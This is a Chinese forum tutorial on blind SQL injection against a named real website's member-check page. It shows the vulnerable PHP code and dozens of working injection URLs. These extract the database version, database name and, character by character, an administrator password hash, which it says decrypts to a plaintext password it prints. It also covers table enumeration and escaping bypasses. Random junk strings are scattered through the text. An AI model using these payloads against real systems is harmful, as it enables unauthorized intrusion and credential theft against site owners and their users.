|
|
本文实例来自习科论坛交流三群。这个注入点可以使用错误回显注入来爆数据,本文出于讲解的目的,使用更麻烦的盲注。0 E$ }& A3 E! c% Z: j0 N
阅读本文,需要有一点点SQL基础。盲注理解起来其实非常简单,就是做起来非常费劲$ u: t5 p4 F6 B* y% |
作者:YoCo Smart2 m y; G+ h! M3 s [
来自:习科信息技术 - http://BlackBap.Org
9 C2 e9 C0 G( ^* r$ a我们先来看注入点,是一个B2B网站建站公司: - http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin
- 用户名已被注册
- http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'
- select userid from demo_b2b_member where user = 'admin''You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin''' at line 1
- |& f7 ?# e# b' r0 n
7 d' {* d6 G7 X* N* m复制代码# N" ]5 Q9 l- o; v- U" q2 A
错误提示已经很明了了。我们看一下注入页面的代码(有删改): - $js_user = trim($_GET["js_user"]);
- if($js_user){
- $num = $db->num_rows("select userid from demo_b2b_member where user = '$js_user'");
- if(!$num)
- echo "<div class=tips3></div>";
- else
- echo "<div class=tips2>用户名已被注册</div>";
- }
P5 B4 @+ ^1 P$ r& U& A+ f* I
0 r: X+ t) y5 o( k$ e复制代码
. Y% p! n/ d6 m" z以GET方式取值的变量js_user虽然没有过滤被直接带入了数据库执行,并且MySQL也执行了,但是并没有显示数据库的任何信息,而是判断是否符合
# k/ [) C0 i# a% A4 g) k那么我们先从union的盲注来看吧。) g+ t6 p% D/ D$ `
先看版本: - http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(version(),1)=5%23
/ B6 C& @0 o. S- }% V
; o f8 H0 S' W. K0 w
复制代码5 e, z8 }. U- ?9 ^: ~: @! `1 Z! ~! x4 Z
这个时候我们来看看原来的代码中的SQL语句是怎么执行的: - select userid from demo_b2b_member where user = 'admin'and left(version(),1)=5#'0 h6 ]2 ^9 h) @9 R- Y# h# R
% s& a& z. H" {8 ~) t1 z6 [* B F复制代码0 g% @; s! b# R! j3 L( A
因为执行成功,所以不符合if(!$num)这个条件,回显“用户名已被注册”,那么版本为5成立
& I: O+ }+ p+ ]9 W0 u再来看database()的数据: - http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+length(database())=6%23
- database()长度6
- http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(database(),1)='l'%23
- l
- http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(database(),2)='li'%23
- li
- http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(database(),3)='lic'%23
- lic
- http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(database(),4)='licl'%23
- licl
- http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(database(),5)='licln'%23
- licln
- http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(database(),6)='liclny'%23
- licclny* R. u+ }7 |1 A1 O5 X& L
+ y0 k; A( c2 Y+ k& w( s; F
复制代码
) g2 Q2 D3 y0 H0 |; H2 G& M# d* ^, `5 olength()函数是计算括号中数据的长度,回显为纯数字,可以用大于小于和等于号来判断是否正确。
9 s/ r/ {% ?6 x1 N/ Y这里要注意看一下left()函数中的数字变化,关于left()函数,可以自行参考MySQL手册。
0 n7 e, x: Q; x4 k r) z再来看一点简单的判断句: - http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+length(pass)=32%23
- select userid from demo_b2b_member where user = 'admin'and length(pass)=32#'! a+ Q. S/ Z0 I# u: U& t6 T0 ]2 v
8 i; L) N+ a& e; Z
复制代码
) g; s2 v5 y' S, g8 t这个时候length()函数中的pass是猜测的,当然是建立在猜测正确的基础上。& @- a# _$ X$ C
这里要说的是,pass和前面select后的userid同属一个表段demo_b2b_admin,所以不需要再带select语句: H% {* Y* S% C' h2 X" @. ]& }6 a
那么这里就能得到: - 这里最后没有'#这个终止符,大家带进去看一下,你们懂得。前开后闭。
- http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,1)='0
- http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,2)='04
- http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,3)='048
- http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,4)='0484
- http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,5)='04843
- http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,6)='04843e
- http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,7)='04843e9
- http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,8)='04843e9f
- http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,9)='04843e9f9
- http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,10)='04843e9f91
- http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,11)='04843e9f91a
- http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,12)='04843e9f91ad
- http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,13)='04843e9f91adf
- http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,14)='04843e9f91adf2
- http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,15)='04843e9f91adf22
- http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,16)='04843e9f91adf228
- http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,17)='04843e9f91adf2287
- http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,18)='04843e9f91adf2287c
- http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,19)='04843e9f91adf2287c0
- http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,20)='04843e9f91adf2287c0a
- http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,21)='04843e9f91adf2287c0af
- http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,22)='04843e9f91adf2287c0af5
- http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,23)='04843e9f91adf2287c0af5f
- http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,24)='04843e9f91adf2287c0af5fe
- http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,25)='04843e9f91adf2287c0af5fe1
- http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,26)='04843e9f91adf2287c0af5fe16
- http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,27)='04843e9f91adf2287c0af5fe167
- http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,28)='04843e9f91adf2287c0af5fe1675
- http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,29)='04843e9f91adf2287c0af5fe16750
- http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,30)='04843e9f91adf2287c0af5fe16750a
- http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,31)='04843e9f91adf2287c0af5fe16750a3
- http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,32)='04843e9f91adf2287c0af5fe16750a35
- 长度是32,是md5加密,解密得到lcl2wly) [: N3 F* z! s% l* ?7 E) E
V ]" s8 t, s: s3 d
复制代码
( Z5 _! ~" B5 J: c这样,猜数据的方法你肯定是懂了% _5 a' [1 j% ]( Y' O1 @
) ~6 I! [' v3 S0 |
' Z4 i3 u. V: {
最后,我们来看demo_b2b_admin以外的数据,现在再来猜表段: - http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+length((select+table_name+from+information_schema.tables+limit+0,1))<100%23
- http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+length((select+table_name+from+information_schema.tables+limit+0,1))=14%23. F$ {. E7 }1 Z+ J$ U0 T. ~
% E: j0 \2 g {0 A复制代码
9 W/ ^' L/ V @9 W0 V( _( T2 ]实际运行的SQL语句就是: - select userid from demo_b2b_member where user = 'admin'and length((select table_name from information_schema.tables limit 0,1))=14#'
& M% u. Q) q% V3 d; i$ R; ^9 y0 L
5 ^' ~5 Q* s8 R5 v g复制代码: Z8 Y$ g; e; z7 W; b
上面这个语句,对于information_schema不明白的,可以参考其他MySQL注入文章来看一下这个库的意义。, h5 b$ ~' c" Z. E3 s6 V
关于limit x,y 的用法,可以参考MySQL手册
7 l5 W1 w0 M2 k4 x" ?, K3 P
% N- O, b0 [; I4 L0 u9 L4 A最后剩下的要说的就是ascii函数和hex函数了2 @, K+ m% Y1 Y2 T2 r+ M
这两个函数的意义是避开php的GPC转义,例如: - http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+substr(left(pass,1),1,1)=char(48)%23
- select userid from demo_b2b_member where user = 'admin'and substr(pass,1,1)=char(48)#
$ L( V! T, l0 q) H1 n5 v" J
% L/ S+ o: x8 j$ J2 `* J- e" i复制代码
8 r, d" V4 b7 w0 D& rsubstr()的用法可以参考MySQL手册,如果不懂,就这样套好了。Char()里面的数字替换为ascii码数字 |
|
发表于 2013-9-25 13:52:56
收藏
支持
反对